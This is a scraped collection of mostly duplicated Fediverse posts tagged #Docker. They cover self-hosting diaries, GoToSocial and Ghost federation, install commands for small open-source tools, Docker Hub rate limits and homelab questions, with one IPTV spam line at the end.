a blog post that details some of the highs and lows I have been experiencing lately in my self-hosting adventures. I have a major challenge ahead - learning #Docker - in order to take advantage of #Ghost x #ActivityPub federation. It's my new Everest 🥲

🔗​:
https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-244-everest-edition/

#MySoCalledSudoLife

Hello my name is Elena and I'm now the owner of 3 VPSs.

I just got a new cheap plan for 6-months to learn #Docker (on a brand new server that I can wipe if things go awry).

Fediverse what did you do to me? From 0 to 3 VPSs in 9 months.

On the bright side, this new passion is far cheaper than ​

Yes I sort of feel like a 🤡​ right now.

😅​😂​

#MySoCalledSudoLife

🏕️ my adventures in #selfhosting: day 244 (Everest edition) ⛰️

a blog post that details some of the highs and lows I have been experiencing lately in my self-hosting adventures. I have a major challenge ahead - learning #Docker - in order to take advantage of #Ghost x #ActivityPub federation. It's my new Everest 🥲

🔗​:
https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-244-everest-edition/

#MySoCalledSudoLife

バックドア付きXZ utilsがDockerイメージに残っている話。バックドアが付いたままイメージ作って更新されなければ、そりゃ残るよなぁ #linux #docker #xzutils

Persistent Risk: XZ Utils Backdoor Still Lurking in Docker Images: https://www.binarly.io/blog/persistent-risk-xz-utils-backdoor-still-lurking-in-docker-images

The moment I had been waiting for… for over 10 days. Home in Italy, with a WiFi connection and a still sleeping child. #Docker learning here we go.

Wishing everyone a great Sunday morning! 🌞

#MySoCalledSudoLife

🔧 Thinking about migrating from Mastodon to GoToSocial?

I've done it – fully documented, production tested, with real benchmarks and custom tooling.

✅ 92% less RAM
✅ 65% less storage
✅ 100% less complexity

📦 Includes slurp import, custom RSS-to-GTS bridge ("GTS-HolMirDas"), federation stats & gotchas.

👉 Read the deep dive: https://blog.klein.ruhr/gotosocial-ready-for-prime-time/

#GoToSocial #GTSHolMirDas #FediFetcher #Fediverse #Selfhosting #Homelab #Migration #Mastodon #Docker

One Open-source Project Daily

A vulnerability scanner for container

https://github.com/anchore/grype

#1ospd #opensource #docker #golang #security #tool #containers #oci #vulnerability #vex #vulnerabilities #containerimage #cyclonedx #openvex

One Open-source Project Daily

A vulnerability scanner for container

https://github.com/anchore/grype

#1ospd #opensource #docker #golang #security #tool #containers #oci #vulnerability #vex #vulnerabilities #containerimage #cyclonedx #openvex

🔧 Thinking about migrating from Mastodon to GoToSocial?

I've done it – fully documented, production tested, with real benchmarks and custom tooling.

✅ 92% less RAM
✅ 65% less storage
✅ 100% less complexity

📦 Includes slurp import, custom RSS-to-GTS bridge ("GTS-HolMirDas"), federation stats & gotchas.

👉 Read the deep dive: https://blog.klein.ruhr/gotosocial-ready-for-prime-time/

#GoToSocial #GTSHolMirDas #FediFetcher #Fediverse #Selfhosting #Homelab #Migration #Mastodon #Docker

🔧 Thinking about migrating from Mastodon to GoToSocial?

I've done it – fully documented, production tested, with real benchmarks and custom tooling.

✅ 92% less RAM
✅ 65% less storage
✅ 100% less complexity

📦 Includes slurp import, custom RSS-to-GTS bridge ("GTS-HolMirDas"), federation stats & gotchas.

👉 Read the deep dive: https://blog.klein.ruhr/gotosocial-ready-for-prime-time/

#GoToSocial #GTSHolMirDas #FediFetcher #Fediverse #Selfhosting #Homelab #Migration #Mastodon #Docker

Hello Fedi friends,

Please stage an intervention. This is a special “my adventures in self-hosting - 🤡 edition” toot.

So I need to learn #Docker in order to move my #Ghost blog there - possibly - as it’s the only way to let it federate (per the official Ghost.org documentation).

If you’ve followed me here for a while, you might have caught a running joke “please don’t tempt me to get a THIRD #VPS”.

This is my mayday, begging you: “please talk me out of getting a third VPS.”

I was happily doing online research wondering if I could install Docker on my #RaspberryPi5. Sure, it’s possible. Good to know.

Then things escalated when I started wondering: “hmmm how much would it cost to get a new VPS for Docker testing purposes?”

I checked out the website of my current VPS provider and noticed that you could get a basic VPS and pick an application that would come pre-installed. Docker is in the list of applications with a thumbs up next to it. Oh and I have a $20 credit after a commission. Awww the temptation!

I’m currently with my extended family in the middle of nowhere, with no WiFi in the house, one bar of 5G in most places (at best) and a laptop that refuses to connect to my phone’s hotspot. I’m typing this on my iPad (which is cooperating, vis-à-vis tethering). It’s my 12th day in this location, with 4 days to go before I return to civilization. I’m easily tempted because I’m going a little batty.

Please please please tell me that it’s better to learn Docker on my Pi 5. It’ll be waiting for me at home in a few days 😅

#MySoCalledSudoLife

Good morning Fedi friends!

A new learning adventure begins 👀

#SelfHosting #Docker #NeverStopLearning #MySoCalledSudoLife

Is it even possible to have a Dockerfile `ENV` default to a build argument?

#Docker #Containers #OCI

@elena Waiting for 6.1 #Ghost in the next few weeks before I push all my instances over from v5 to 6. Looking forward to the federation feature!

#docker all the way 🤘🏻

I just read Ghost’s developer docs and I think if I want to turn on federation for my blog I need to migrate my #Ghost CLI installation to #Docker:

https://docs.ghost.org/update?ref=ghost.org

I know nothing about Docker but I also have no internet on my laptop / can’t update Ghost anyway right now (see today’s blog post.)

I wonder: what’s the best way to learn Docker (or have a basic understanding of it) if you have 12 days to study it? I need a good Docker tutorial STAT 😅

I just read Ghost’s developer docs and I think if I want to turn on federation for my blog I need to migrate my #Ghost CLI installation to #Docker:

https://docs.ghost.org/update?ref=ghost.org

I know nothing about Docker but I also have no internet on my laptop / can’t update Ghost anyway right now (see today’s blog post.)

I wonder: what’s the best way to learn Docker (or have a basic understanding of it) if you have 12 days to study it? I need a good Docker tutorial STAT 😅

I just read Ghost’s developer docs and I think if I want to turn on federation for my blog I need to migrate my #Ghost CLI installation to #Docker:

https://docs.ghost.org/update?ref=ghost.org

I know nothing about Docker but I also have no internet on my laptop / can’t update Ghost anyway right now (see today’s blog post.)

I wonder: what’s the best way to learn Docker (or have a basic understanding of it) if you have 12 days to study it? I need a good Docker tutorial STAT 😅

🔧 Thinking about migrating from Mastodon to GoToSocial?

I've done it – fully documented, production tested, with real benchmarks and custom tooling.

✅ 92% less RAM
✅ 65% less storage
✅ 100% less complexity

📦 Includes slurp import, custom RSS-to-GTS bridge ("GTS-HolMirDas"), federation stats & gotchas.

👉 Read the deep dive: https://blog.klein.ruhr/gotosocial-ready-for-prime-time/

#GoToSocial #GTSHolMirDas #FediFetcher #Fediverse #Selfhosting #Homelab #Migration #Mastodon #Docker

The new Kubernetes mount-an-OCI-artifact feature got me thinking about backups, layers, data locality, and deduplication via CAS.

Imagine using image layers as snapshots and pushing images as your application's data backup. Then by specifying latest* for the volume mount it would automatically come up with eagerly-cached, local data.

I don't think CAS helps our case for storage here as a layer-snapshot mapping isn't granular enough. Of course it's not like you'd want to redesign your Postgres paging configuration entirely around a better mapping to image layers but there's something there...

Registry-side you could do periodic compaction, archival, export etc.

OCI image layers are already limited though last time I checked. Nix maps derivations (think packages) to layers and neither OCI nor the tooling were designed for that kind of blowout. Could be tackled though.

*yes yes, anti pattern. Hold ur underwear a moment.

#OCI #Containers #Kubernetes #k8s #PlatformEngineering #DevOps #Cloud #Docker

Burned by Google’s latest(?) project shuttering? I wrote a quick post on how to build container images without resorting to hacks like docker-in-docker or privileged containers. Because somehow the year is 2025 and it’s STILL hard to build images without these hacks and access to a Docker daemon 🤣

https://ianwwagner.com/til/rootless-gitlab-ci-container-builds-with-buildkit

#DevOps #Docker #podman #kubernetes

Wer noch eine #selfhosted-Alternative für #komoot (samt Importmöglich daraus und aus Strava!) sucht, dem sei mal #wanderer ans Herz gelegt.

Sehr früh bereits sehr stabil, wunderschönes #Docker-Deployment! 👍🏻

https://wanderer.to

German Version (english below)

Ich habe gerade "GTS-HolMirDas" als Open Source Projekt veröffentlicht.

Ein RSS-basiertes Content-Discovery-Tool für kleinere GoToSocial-Instanzen. Es hilft dabei, die föderierte Timeline zu füllen, ohne auf traditionelle Relays angewiesen zu sein.

Was es macht:

• Verarbeitet RSS-Feeds verschiedener Fediverse-Instanzen
• Docker-Deployment mit simplem .env-Setup
• Sehr ressourcenschonend (kompletter Stack mit GoToSocial + FediFetcher: ~450MB RAM)
• Zeigt detaillierte Statistiken

Inspiriert von Alice's HolMirDas für Misskey (@aliceif), angepasst für GoToSocial mit Docker-Integration.

Repository: https://git.klein.ruhr/matthias/gts-holmirdas

Läuft bei mir produktiv und verarbeitet stündlich Content von 80 RSS-Feeds. Falls jemand sowas braucht - einfach ausprobieren.

Feedback gerne willkommen! 🚀

Just released "GTS-HolMirDas" as an open source project.

RSS-based content discovery tool for smaller GoToSocial instances. Helps populate your federated timeline without relying on traditional relays.

What it does:

• Processes RSS feeds from various Fediverse instances
• Docker deployment with simple .env setup
• Very resource-efficient (complete stack with GoToSocial + FediFetcher: ~450MB RAM)
• Shows detailed statistics

Inspired by Alice's HolMirDas for Misskey (@aliceif), adapted for GoToSocial with Docker integration.

Repository: https://git.klein.ruhr/matthias/gts-holmirdas

Running in production here, processing content from 80 RSS feeds hourly. If anyone needs something like this - just give it a try.

Feedback welcome! 🚀

#GoToSocial #SelfHosting #Fediverse #OpenSource #ContentDiscovery #RSS #ActivityPub #Homelab #Docker #SmallInstance #Federation

German Version (english below)

Ich habe gerade "GTS-HolMirDas" als Open Source Projekt veröffentlicht.

Ein RSS-basiertes Content-Discovery-Tool für kleinere GoToSocial-Instanzen. Es hilft dabei, die föderierte Timeline zu füllen, ohne auf traditionelle Relays angewiesen zu sein.

Was es macht:

• Verarbeitet RSS-Feeds verschiedener Fediverse-Instanzen
• Docker-Deployment mit simplem .env-Setup
• Sehr ressourcenschonend (kompletter Stack mit GoToSocial + FediFetcher: ~450MB RAM)
• Zeigt detaillierte Statistiken

Inspiriert von Alice's HolMirDas für Misskey (@aliceif), angepasst für GoToSocial mit Docker-Integration.

Repository: https://git.klein.ruhr/matthias/gts-holmirdas

Läuft bei mir produktiv und verarbeitet stündlich Content von 80 RSS-Feeds. Falls jemand sowas braucht - einfach ausprobieren.

Feedback gerne willkommen! 🚀

Just released "GTS-HolMirDas" as an open source project.

RSS-based content discovery tool for smaller GoToSocial instances. Helps populate your federated timeline without relying on traditional relays.

What it does:

• Processes RSS feeds from various Fediverse instances
• Docker deployment with simple .env setup
• Very resource-efficient (complete stack with GoToSocial + FediFetcher: ~450MB RAM)
• Shows detailed statistics

Inspired by Alice's HolMirDas for Misskey (@aliceif), adapted for GoToSocial with Docker integration.

Repository: https://git.klein.ruhr/matthias/gts-holmirdas

Running in production here, processing content from 80 RSS feeds hourly. If anyone needs something like this - just give it a try.

Feedback welcome! 🚀

#GoToSocial #SelfHosting #Fediverse #OpenSource #ContentDiscovery #RSS #ActivityPub #Homelab #Docker #SmallInstance #Federation

Wer noch eine #selfhosted-Alternative für #komoot (samt Importmöglich daraus und aus Strava!) sucht, dem sei mal #wanderer ans Herz gelegt.

Sehr früh bereits sehr stabil, wunderschönes #Docker-Deployment! 👍🏻

https://wanderer.to

🏕️ my adventures in self-hosting: day 220 (roller coaster edition) 🎢

A new blog post where I discuss how sanity prevailed and I will NOT install my own Lemmy instance. But! Now I'm tempted to set up something else. Thankfully reality for now is disrupting my fanciful plans.

🔗​: https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-220-roller-coaster-edition/

#MySoCalledSudoLife #Sharkey #Friendica #GoToSocial #YunoHost #Docker

Just published a blog post on optimizing Gradle builds with Docker, Flyway, jOOQ & Postgres 🐘🐳🐦

I hit a weird issue where the DB started up even when everything was up-to-date. Turns out: Gradle task graphs & build services can be tricky!

Here’s how I fixed it with a cleaner setup 👇
https://britter.dev/blog/2025/07/22/gradle-jooq-docker/

#gradle #docker #jooq #flyway #java #devlog #programming

Just published a blog post on optimizing Gradle builds with Docker, Flyway, jOOQ & Postgres 🐘🐳🐦

I hit a weird issue where the DB started up even when everything was up-to-date. Turns out: Gradle task graphs & build services can be tricky!

Here’s how I fixed it with a cleaner setup 👇
https://britter.dev/blog/2025/07/22/gradle-jooq-docker/

#gradle #docker #jooq #flyway #java #devlog #programming

What are your favourite monitoring tools for your home labs?

I’m looking to get some recommendations. Be great if it has an accompanying app for mobile or a decent web app.

#SelfHosting #SelfHosted #HomeLab #Docker

What are your favourite monitoring tools for your home labs?

I’m looking to get some recommendations. Be great if it has an accompanying app for mobile or a decent web app.

#SelfHosting #SelfHosted #HomeLab #Docker

Some exciting #stigmerge updates to share!

All stigmerge peers are now seeders -- there are no #leechers in official stigmerge releases. Sharing is caring! #veilid private routing mitigates the privacy hazards normally associated with sharing content over public networks directly.

Peers gossip with each other _constantly_, advertising themselves and discovering new neighbors -- and they store these contact lists in the #veilid DHT like a pheromone trail. So even when an original seeder is long gone and goes offline -- if just one of its last-known neighbors is online, future travelers still have a chance to join a live swarm of active peers.

Fetchers can balance downloads among multiple peers, gravitating towards the most productive ones.

It's also super-easy to run stigmerge from an OCI container now (#Docker or #Podman as you like).

Check out the updated README for more details -- and the 0.5.6 release to try these new superpowers out for yourself!

https://github.com/cmars/stigmerge
https://github.com/cmars/stigmerge/releases/tag/stigmerge-v0.5.6

#filesharing #p2p #anonymity #privacy

Some exciting #stigmerge updates to share!

All stigmerge peers are now seeders -- there are no #leechers in official stigmerge releases. Sharing is caring! #veilid private routing mitigates the privacy hazards normally associated with sharing content over public networks directly.

Peers gossip with each other _constantly_, advertising themselves and discovering new neighbors -- and they store these contact lists in the #veilid DHT like a pheromone trail. So even when an original seeder is long gone and goes offline -- if just one of its last-known neighbors is online, future travelers still have a chance to join a live swarm of active peers.

Fetchers can balance downloads among multiple peers, gravitating towards the most productive ones.

It's also super-easy to run stigmerge from an OCI container now (#Docker or #Podman as you like).

Check out the updated README for more details -- and the 0.5.6 release to try these new superpowers out for yourself!

https://github.com/cmars/stigmerge
https://github.com/cmars/stigmerge/releases/tag/stigmerge-v0.5.6

#filesharing #p2p #anonymity #privacy

Okay so this evening I finally got around to setting up some backup logic on my NAS. I have an rclone docker container which runs a “copy” command every night to backup my docker data/config directory and store it in an S3 storage bucket, and the removes itself so it doesn’t use any unnecessary resource.

It’s definitely not perfect (it might even be overly complicated), but it’ll do for now. At least I know I have some form of backup should shit hit the fan.

#SelfHosting #SelfHosted #HomeLab #Docker

Question for Docker / Portainer users; How do you manage your backups?

I really don’t want to make any services I host “live” before I have a good backup solution in place so looking for tips! Thanks!

#SelfHosting #SelfHosted #HomeLab #Docker #Portainer

It took a while to get my head around as I’m a complete noob at it, but this afternoon I’ve got Docker and Portainer setup and a container running Nginx.

Also got a cronjob running every 10 minutes to automatically update DNS records in Cloudflare whenever it detects my public IP at home has updated. 😎

#SelfHosting #SelfHosted #HomeLab #Docker #Portainer #Nginx #Cloudflare

Set up Collabora Online in minutes!

Watch how to set up Collabora Online on a Raspberry Pi or Linux system using the Collabora/CODE Docker image — simple and efficient.

☑️ Quick Raspberry Pi setup
☑️ Easy Docker installation
☑️ The simplicity of running Collabora Online without complex setups

🎬 Ready to get started? Watch the full guide: https://buff.ly/ddlzXH0

#SelfHosting #Docker #CollaboraOnline #OpenSource #RaspberryPi

Set up Collabora Online in minutes!

Watch how to set up Collabora Online on a Raspberry Pi or Linux system using the Collabora/CODE Docker image — simple and efficient.

☑️ Quick Raspberry Pi setup
☑️ Easy Docker installation
☑️ The simplicity of running Collabora Online without complex setups

🎬 Ready to get started? Watch the full guide: https://buff.ly/ddlzXH0

#SelfHosting #Docker #CollaboraOnline #OpenSource #RaspberryPi

👋 Moin!

Ich komm aus Buxtehude, bastel Server und trink Kaffee wie root Bier.
Meine Hobbys: Dinge hosten, bis sie laufen. Dann neustarten.
Selfhosting, Open Source, Fahrrad, bissl Aktienquatsch nebenbei.
#introductions #Fediverse #Linux #NordNerd #Docker

I'd like a solution to self-host services such as Vaultwarden, Immich and Home Assistant at home. I don't want to rely on cloud solutions for this so I'm thinking maybe along the lines of a Raspberry Pi for the Docker apps and a NAS for the backend storage, but I'm really clueless as what to get. I just know that I'd want something relatively simple and easy to maintain.

I'm also a bit of a Linux and Docker noob so I'm looking to get some advice and ideas from the Fedi community!

What would your suggestions be? What does your home lab setup look like?

#SelfHosted #HomeLab #Linux #Docker #NAS #RaspberryPi #VaultWarden #Immich #HomeAssistant

Wir suchen ein*e Entwickler*in für Python und Django. Unsere Wildvogelhilfe hat eine eigene Patienten-Webapp, welche dringend mehr technische Untersützung braucht.
https://git.kraut.space/nabujena/FallenBirdyForm
Melde dich wenn du uns helfen kannst.
#FOSS #Hilfe #NABU #OpenSource #Dev #Python #Docker #Ehrenamt

OrbStack is so good. It's a drop-in replacement for #Docker on #Mac with a sleek native app as a control centre.

https://orbstack.dev

OrbStack is so good. It's a drop-in replacement for #Docker on #Mac with a sleek native app as a control centre.

https://orbstack.dev

whoa Apple made its own Docker alternative. So now both Apple and Microsoft have first-party functionality targeted at running Linux virtual machines on their operating systems—wild!

https://mastodon.social/@ktoso/114656000791434716

#macos #docker #linux

whoa Apple made its own Docker alternative. So now both Apple and Microsoft have first-party functionality targeted at running Linux virtual machines on their operating systems—wild!

https://mastodon.social/@ktoso/114656000791434716

#macos #docker #linux

What lightweight monitoring option can I run that will give me historical stats on memory and cpu for both the host and each container? I'm trying to track down a random timeout (suspecting caused by cpu spikes) at exactly 2am on some nights.

Should run as a docker container. Thanks!

#docker #containers #monitoring #boost #selfhosted #homelab

오늘 오후 2시, #포항 #한동대학교 에서 #Ubuntu 리눅스를 활용한 프론트엔드 배포 환경 구축 워크샵이 열립니다!
참가 마감은 오후 1시 30분까지이니, 참가를 희망하신다면 지금도 신청하실 수 있습니다 :)

잠시 후 뵙겠습니다!
#Multipass #Rockcraft #Docker
🎟️ 참가 신청 https://event-us.kr/m/104210/35052

오늘 오후 2시, #포항 #한동대학교 에서 #Ubuntu 리눅스를 활용한 프론트엔드 배포 환경 구축 워크샵이 열립니다!
참가 마감은 오후 1시 30분까지이니, 참가를 희망하신다면 지금도 신청하실 수 있습니다 :)

잠시 후 뵙겠습니다!
#Multipass #Rockcraft #Docker
🎟️ 참가 신청 https://event-us.kr/m/104210/35052

@mobilizon any estimate when the docker image will be upgraded to fix the latest vulnerability? I had to shut down our instance until it's available.

If CI is broken, could someone just make a new image manually for this release?

#mobilizon #Vulnerability #docker

Do you want to help testing @badgefed and provision your local test instance?

Easy

docker pull ghcr.io/tryvocalcat/badgefed:latest &&
docker run -v `pwd`/data:/app/data \
-p 8080:8080 \
-e SQLITE_DB_FILENAME=/app/data/badges.db \
-e AdminAuthentication__AdminUsers__0__Id=your-mastodon-username \
-e AdminAuthentication__AdminUsers__0__Type=Mastodon \
-e MastodonConfig__ClientId=your-mastodon-client-id \
-e MastodonConfig__ClientSecret=your-mastodon-client-secret \
-e MastodonConfig__Server=your-mastodon-server \
ghcr.io/tryvocalcat/badgefed

And then open a browser and go to http://localhost:8080 or http://localhost:8080/admin

#docker #badgefed #openbadges #softwaredevelopment #testing #fediverse #activitypub

Do you want to help testing @badgefed and provision your local test instance?

Easy

docker pull ghcr.io/tryvocalcat/badgefed:latest &&
docker run -v `pwd`/data:/app/data \
-p 8080:8080 \
-e SQLITE_DB_FILENAME=/app/data/badges.db \
-e AdminAuthentication__AdminUsers__0__Id=your-mastodon-username \
-e AdminAuthentication__AdminUsers__0__Type=Mastodon \
-e MastodonConfig__ClientId=your-mastodon-client-id \
-e MastodonConfig__ClientSecret=your-mastodon-client-secret \
-e MastodonConfig__Server=your-mastodon-server \
ghcr.io/tryvocalcat/badgefed

And then open a browser and go to http://localhost:8080 or http://localhost:8080/admin

#docker #badgefed #openbadges #softwaredevelopment #testing #fediverse #activitypub

Do you want to help testing @badgefed and provision your local test instance?

Easy

docker pull ghcr.io/tryvocalcat/badgefed:latest &&
docker run -v `pwd`/data:/app/data \
-p 8080:8080 \
-e SQLITE_DB_FILENAME=/app/data/badges.db \
-e AdminAuthentication__AdminUsers__0__Id=your-mastodon-username \
-e AdminAuthentication__AdminUsers__0__Type=Mastodon \
-e MastodonConfig__ClientId=your-mastodon-client-id \
-e MastodonConfig__ClientSecret=your-mastodon-client-secret \
-e MastodonConfig__Server=your-mastodon-server \
ghcr.io/tryvocalcat/badgefed

And then open a browser and go to http://localhost:8080 or http://localhost:8080/admin

#docker #badgefed #openbadges #softwaredevelopment #testing #fediverse #activitypub

git-next: 🔥 New release v2025.5.0 - Refactoring and isolating features

🧩 git-next: trunk-based development manager
🦀 Written in Rust
⭐ Repo: https://codeberg.org/kemitix/git-next

What's New

- Reimplement git operations to use git2/libgit2
- Renamed features:

forgejo -> forge-forgejo

github -> forge-github

notify-desktop

notify-email

This a significant update to migrate from gix to git2 for git operations. This allows us to drop the gix crate and the need to shelling-out to git for operations that gix doesn't support.

Breaking Change

If you are build from source (e.g. cargo install) and use either email or desktop notifications in your configuration file, you will need to add the appropriate feature, notify-desktop and/or notify-email. If you don't the config file will not be accepted.

The docker images are built with all features enabled.

Install

📦 cargo install git-next@2025.5.0
📦 cargo install git-next@2025.5.0 --features notify-desktop,notify-email
🐋 docker pull codeberg.org/kemitix/git-next:v2025.5.0

Run UI in docker

docker run --rm -p 8092:8092 \
  -u $(id -u):$(id -g) \
  -it \
  -v $PWD:/app \
  codeberg.org/kemitix/git-next:v2025.5.0 \
  server start --xui

#RustLang #Ratatui #Git #GitNext #OpenSource #Docker #GitHub #ForgeJo

git-next: 🔥 New release v2025.5.0 - Refactoring and isolating features

🧩 git-next: trunk-based development manager
🦀 Written in Rust
⭐ Repo: https://codeberg.org/kemitix/git-next

What's New

- Reimplement git operations to use git2/libgit2
- Renamed features:

forgejo -> forge-forgejo

github -> forge-github

notify-desktop

notify-email

This a significant update to migrate from gix to git2 for git operations. This allows us to drop the gix crate and the need to shelling-out to git for operations that gix doesn't support.

Breaking Change

If you are build from source (e.g. cargo install) and use either email or desktop notifications in your configuration file, you will need to add the appropriate feature, notify-desktop and/or notify-email. If you don't the config file will not be accepted.

The docker images are built with all features enabled.

Install

📦 cargo install git-next@2025.5.0
📦 cargo install git-next@2025.5.0 --features notify-desktop,notify-email
🐋 docker pull codeberg.org/kemitix/git-next:v2025.5.0

Run UI in docker

docker run --rm -p 8092:8092 \
  -u $(id -u):$(id -g) \
  -it \
  -v $PWD:/app \
  codeberg.org/kemitix/git-next:v2025.5.0 \
  server start --xui

#RustLang #Ratatui #Git #GitNext #OpenSource #Docker #GitHub #ForgeJo

🤖✨ Ah, finally! Because what #developer hasn't dreamt of transforming their #Docker #nightmares into standalone executable horrors?🔨👻 Now, brace yourself for terminal-induced #PTSD as you navigate yet another #GitHub maze that promises to "simplify" your life. 🌀🚀
https://github.com/rzane/docker2exe #Simplification #Tools #Terminal #HackerNews #ngated

🤖✨ Ah, finally! Because what #developer hasn't dreamt of transforming their #Docker #nightmares into standalone executable horrors?🔨👻 Now, brace yourself for terminal-induced #PTSD as you navigate yet another #GitHub maze that promises to "simplify" your life. 🌀🚀
https://github.com/rzane/docker2exe #Simplification #Tools #Terminal #HackerNews #ngated

Writing a single bash script that turns a clean #Debian install into an opinionated #selfhosted setup (the one that I use myself) with:

* #Docker
* #dockge as web UI for managing docker-compose stacks
* @tailscale setup to expose deployed services with TSDProxy as separate TS domains
* Restic for data backups

Anybody interested?

Services I'm currently #SelfHosting in #Docker (managed via #Dockge):
* @silverbulletmd (notes, tasks, life)
* Miniflux (RSS reader)
* Jellyfin (local media streaming)
* Linkding (bookmarks)
* N8n (workflow automation)
* SearXNG (private search engine)
* Syncthing (sync)
* Minecraft server (for the kids)
* Calibre web (Web UI to my Calibre e-book collection)

Note to #php developers who want to distribute #docker images: please consider making your base image *without* the webserver first, and a separate "all-in-one" image if you want to provide something for end users.

I've reinstalled Slackware and now I'm on "stable".
I'm trying to install docker, and I see that I need to install runc and containerd, but I'm getting this error whien trying to compile runc (I'm using sbopkg for all of these packages.
(Also, I am using alien and multilib)

Any ideas?

#slackware #slackware64 #docker #linux

@elena Well it would be best to have the exact setup, yes, just to see how it all behaves, but even if its not, and even if its deployed differently, at least you will know if there are any breaking changes.

For example a parallel #docker deployment of 2 containers (ghost + db) will be more than enough to confirm that the new version of Ghost is working as intended with all your configurations, themes, etc. Restore your current DB content there and rest is fairly easy.

From last week's Linux Update newsletter: Koen Vervloesem shows you how to manage containers with MicroOS, Cockpit, and Podman
https://www.linux-magazine.com/Issues/2025/291/Container-Management?utm_source=SM
#containers #openSUSE #MicroOS #Cockpit #Podman #Docker

From last week's Linux Update newsletter: Koen Vervloesem shows you how to manage containers with MicroOS, Cockpit, and Podman
https://www.linux-magazine.com/Issues/2025/291/Container-Management?utm_source=SM
#containers #openSUSE #MicroOS #Cockpit #Podman #Docker

One month has passed since I am using #selfhosted #activitypub instance 🎉. I have linux #docker compose stack with @mitra backend (#rust/#postgresql) written by @silverpill and @phanpy as my daily UI for desktop and mobile. Everything works fluent, backend memory print is really low and disk usage is about 2.3 GB as I have set data retention limit to one week and it is totally enough. I am following directly around 150 users + following 7 hashtags via https://relay.fedi.buzz/ which brings also optimal amount of federated posts into my server. Highly recommended!

One month has passed since I am using #selfhosted #activitypub instance 🎉. I have linux #docker compose stack with @mitra backend (#rust/#postgresql) written by @silverpill and @phanpy as my daily UI for desktop and mobile. Everything works fluent, backend memory print is really low and disk usage is about 2.3 GB as I have set data retention limit to one week and it is totally enough. I am following directly around 150 users + following 7 hashtags via https://relay.fedi.buzz/ which brings also optimal amount of federated posts into my server. Highly recommended!

国立国会図書館のOCRライブラリが凄くよかった件(Windows向け) #Docker - Qiita https://qiita.com/yanosen_jp/items/9d3852c29c80dbb952f2

#guix social talk this week by @paulbutgold on self-hosting @forgejo using #oci / #docker #containers

His Gocix project brings the power of declarative configuration to running container services.

Details on the Wiki or register at the Meetup:

- https://libreplanet.org/wiki/Group:Guix/GuixSocial

- https://www.meetup.com/guix-social/events/306340848/

@fnat

#guix #nix #linux #containers #docker #oci #scheme #guile #selfhosting #forge #foss

#guix social talk this week by @paulbutgold on self-hosting @forgejo using #oci / #docker #containers

His Gocix project brings the power of declarative configuration to running container services.

Details on the Wiki or register at the Meetup:

- https://libreplanet.org/wiki/Group:Guix/GuixSocial

- https://www.meetup.com/guix-social/events/306340848/

@fnat

#guix #nix #linux #containers #docker #oci #scheme #guile #selfhosting #forge #foss

“With Docker, we learned that the hard way”

🎥 https://youtu.be/ZthqD40zzMQ

#Dagger (previously #Docker) founder @shykes speaks candidly about the different between an #opensource ecosystem and an actual community

Our #Mastodon Server for #NuttX Continuous Integration has been super helpful, pushing out alerts of Failed Builds ... Here's how we installed Mastodon Server with #Docker Compose

Article: https://lupyuen.org/articles/mastodon.html

@Plasticbluemusic 👆👆👆(maybe this will help)

#Fediverse #Fedi #Mastodon #ActivityPub #Docker

MCU but it's Docker: I am chroot

#shitpost #Docker #OCI #Containers

TeXLive 2024 was frozen a few days ago, and this always leads to issues with the pandoc/latex Docker images. We have pushed new images for the currently supported pandoc versions 3.5 and 3.6.3, and are in the process of updating 3.2.1, too.
#pandoc #docker

Blogged: Running an ASP.​NET Core app inside IIS in a Windows container

https://andrewlock.net/running-an-aspnetcore-app-behind-iis-in-a-windows-container/

In this post I describe how to run an ASP.​NET Core app inside IIS in a Windows Docker container

#aspnetcore #docker #dotnet

Coming up on my task list is getting multiple/different containers running on a single domain using subdomains… can that work?

So app1.example.com is one Podman container and app2.example.com is a different Podman container… (both using port 80)

I’ve found this guide I might try, but if you have a better way please let me know!

➡️ https://www.redhat.com/en/blog/podman-nginx-multidomain-applications

#podman #docker #containers #web #nginx #selfhosted

Bin echt am überlegen, ob ich mit meinem Server von #NixOS zurück auf #ArchLinux gehen soll. Beim Herumprobieren mit #Docker habe ich festgestellt, dass der eine oder andere Container über Arch besser läuft als über Nix. Ich dachte erst, ich hätte bei der Konfiguration was vergessen, aber das Wiki sagt an sich Nein.

https://nixos.wiki/wiki/Docker

Während zum Beispiel ein Container über NixOS ständig crashed, läuft dieser über Arch permanent durch. Ist mir echt ein Rätsel wie das sein könnte, dürfte sich durch Docker doch eigentlich, bis auf die Hardware, nichts zwischen Betriebssystem unterscheiden, vor allem, wenn man sich was von GitHub zieht.

#Linux #Homeserver #Homelab #Selfhosting #Selfhosted

Developing apps is even more rewarding with Nextcloud Hub 10! 🧑‍💻

Now built into Nextcloud: develop apps in any dev language using our AppAPI and deploy via #Docker!

#Rust? #golang? Your choice!

🔗 Read more with other improvements in our blog:

https://nextcloud.com/blog/nextcloud-hub10/

Developing apps is even more rewarding with Nextcloud Hub 10! 🧑‍💻

Now built into Nextcloud: develop apps in any dev language using our AppAPI and deploy via #Docker!

#Rust? #golang? Your choice!

🔗 Read more with other improvements in our blog:

https://nextcloud.com/blog/nextcloud-hub10/

What is a "big image" at Anthropic? 35GB uncompressed

#planetnix #kubernetes #docker #scale22x

Leaving this up with `latest` tag and no `ONBUILD` or other deprecation warning is fucking criminal

#Docker #Containers #OCI

"#Docker has delayed its plan to limit image pulls ... from Docker Hub, by one month"

https://www.theregister.com/2025/02/22/docker_hub_pull_limits/

@elena Well done! Welcome to the #GhostClub!

#docker #synology #selfhosting

Bruhh, new #docker hub limits are insane. Imagine you debug something and need to wait another hour to download an image. 10 downloads per ip is very hard.

Ohhh the Docker rate limit change might directly be the new ex-Oracle CEO.

Hmm

H/t @daedalus and The Crux for covering that

#Docker #OCI #Containers

Docker Hub will only allow an unauthenticated 10/pulls per hour starting March 1st

https://docs.docker.com/docker-hub/usage/

Discussions: https://discu.eu/q/https://docs.docker.com/docker-hub/usage/

#devops #docker #kubernetes

Docker Hub will only allow an unauthenticated 10/pulls per hour starting March 1st

https://docs.docker.com/docker-hub/usage/

Discussions: https://discu.eu/q/https://docs.docker.com/docker-hub/usage/

#devops #docker #kubernetes

『docker-compose.ymlをDRYに書くテクニック2選 #Docker - Qiita』 - https://qiita.com/reireias/items/ecb81e248314253eb156

Looking for the Best IPTV Provider in Canada? The Best IPTV Service in Canada 🇨🇦 2025 Top IPTV Providers Reddit

http://focus4k.com

